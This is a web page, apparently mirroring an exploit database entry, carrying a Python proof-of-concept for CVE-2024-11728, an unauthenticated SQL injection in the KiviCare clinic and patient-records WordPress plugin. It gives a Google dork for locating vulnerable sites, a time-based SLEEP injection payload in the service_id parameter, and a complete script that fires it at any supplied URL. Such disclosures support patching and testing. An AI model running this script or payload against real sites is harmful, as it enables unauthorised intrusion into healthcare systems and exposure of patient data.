扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 |
# Exploit Title: KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection SQL Injection # Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/ # Date: 11/12/2024 # Exploit Author: Samet "samogod" Gözet # Vendor Homepage: wordpress.org # Software Link: <blockquote class="wp-embedded-content" data-secret="QyVr3TOVx3"><a href="https://wordpress.org/plugins/kivicare-clinic-management-system/" target="_blank"rel="external nofollow" class="external" >KiviCare – Clinic & Patient Management System (EHR)</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“KiviCare – Clinic & Patient Management System (EHR)” — Plugin Directory" src="https://wordpress.org/plugins/kivicare-clinic-management-system/embed/#?secret=PXdLMlwU38#?secret=QyVr3TOVx3" data-secret="QyVr3TOVx3" frameborder="0" marginmarginscrolling="no"></iframe> # Version: < 3.6.5 # Tested on: Ubuntu 22.04 # CVE : CVE-2024-11728 #!/usr/bin/env python3 """ CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection PoC Author: samogod.samet.g Description: Proof of Concept for Unauthenticated SQL Injection vulnerability in KiviCare WordPress Plugin <= 3.6.4. The vulnerability exists in the tax_calculated_data AJAX action where the visit_type[service_id] parameter is insufficiently escaped, allowing SQL injection attacks. Usage: python3 CVE-2024-11728.py -u <target_url> [-t <timeout>] [-v] """ import argparse import requests import sys import time from urllib3.exceptions import InsecureRequestWarning # Disable SSL warnings requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) class KiviCareExploit: def __init__(self, url, timeout=10, verbose=False): self.url = url.rstrip('/') self.timeout = timeout self.verbose = verbose self.target = f"{self.url}/wp-admin/admin-ajax.php" self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': '*/*' } def log(self, message, level="info"): """Custom logging function""" colors = { "info": "\033[94m[*]", "success": "\033[92m[+]", "error": "\033[91m[-]", "warning": "\033[93m[!]" } print(f"{colors.get(level, '[*]')} {message}\033[0m") def verify_vulnerability(self): """Verify if the target is vulnerable using a time-based SQL injection""" self.log("Testing vulnerability with time-based SQL injection...") data = { 'action': 'ajax_post', 'route_name': 'tax_calculated_data', 'clinic_id[id]': '1', 'doctor_id[id]': '1', 'visit_type[0][service_id]': "123) AND (SELECT * FROM (SELECT(SLEEP(5)))alias) AND (1=1", '_ajax_nonce': '5d77fc94cf' # You need to update this nonce value } try: normal_data = { 'action': 'ajax_post', 'route_name': 'tax_calculated_data', 'clinic_id[id]': '1', 'doctor_id[id]': '1', 'visit_type[0][service_id]': "1", '_ajax_nonce': '5d77fc94cf' # You need to update this nonce value } start_time = time.time() normal_response = requests.post( self.target, data=normal_data, headers=self.headers, verify=False, timeout=self.timeout ) normal_time = time.time() - start_time if self.verbose: self.log(f"Normal request time: {normal_time:.2f} seconds", "info") self.log(f"Normal response: {normal_response.text}", "info") start_time = time.time() try: response = requests.post( self.target, data=data, headers=self.headers, verify=False, timeout=self.timeout ) elapsed_time = time.time() - start_time if self.verbose: self.log(f"Injection request time: {elapsed_time:.2f} seconds", "info") self.log(f"Request data: {data}", "info") if elapsed_time >= 4.5: self.log("Target appears to be vulnerable!", "success") return True else: self.log("Target does not appear to be vulnerable.", "warning") return False except requests.exceptions.Timeout: self.log("Request timed out - target is vulnerable!", "success") return True except requests.exceptions.RequestException as e: self.log(f"Error during vulnerability check: {str(e)}", "error") return False def main(): parser = argparse.ArgumentParser(description='KiviCare WordPress Plugin Unauthenticated SQL Injection PoC (CVE-2024-11728)') parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://example.com)') parser.add_argument('-t', '--timeout', type=int, default=10, help='Request timeout in seconds') parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose output') args = parser.parse_args() print(""" CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection Author: samogod.samet.g """) exploit = KiviCareExploit(args.url, args.timeout, args.verbose) exploit.verify_vulnerability() if __name__ == '__main__': main() |
体验盒子
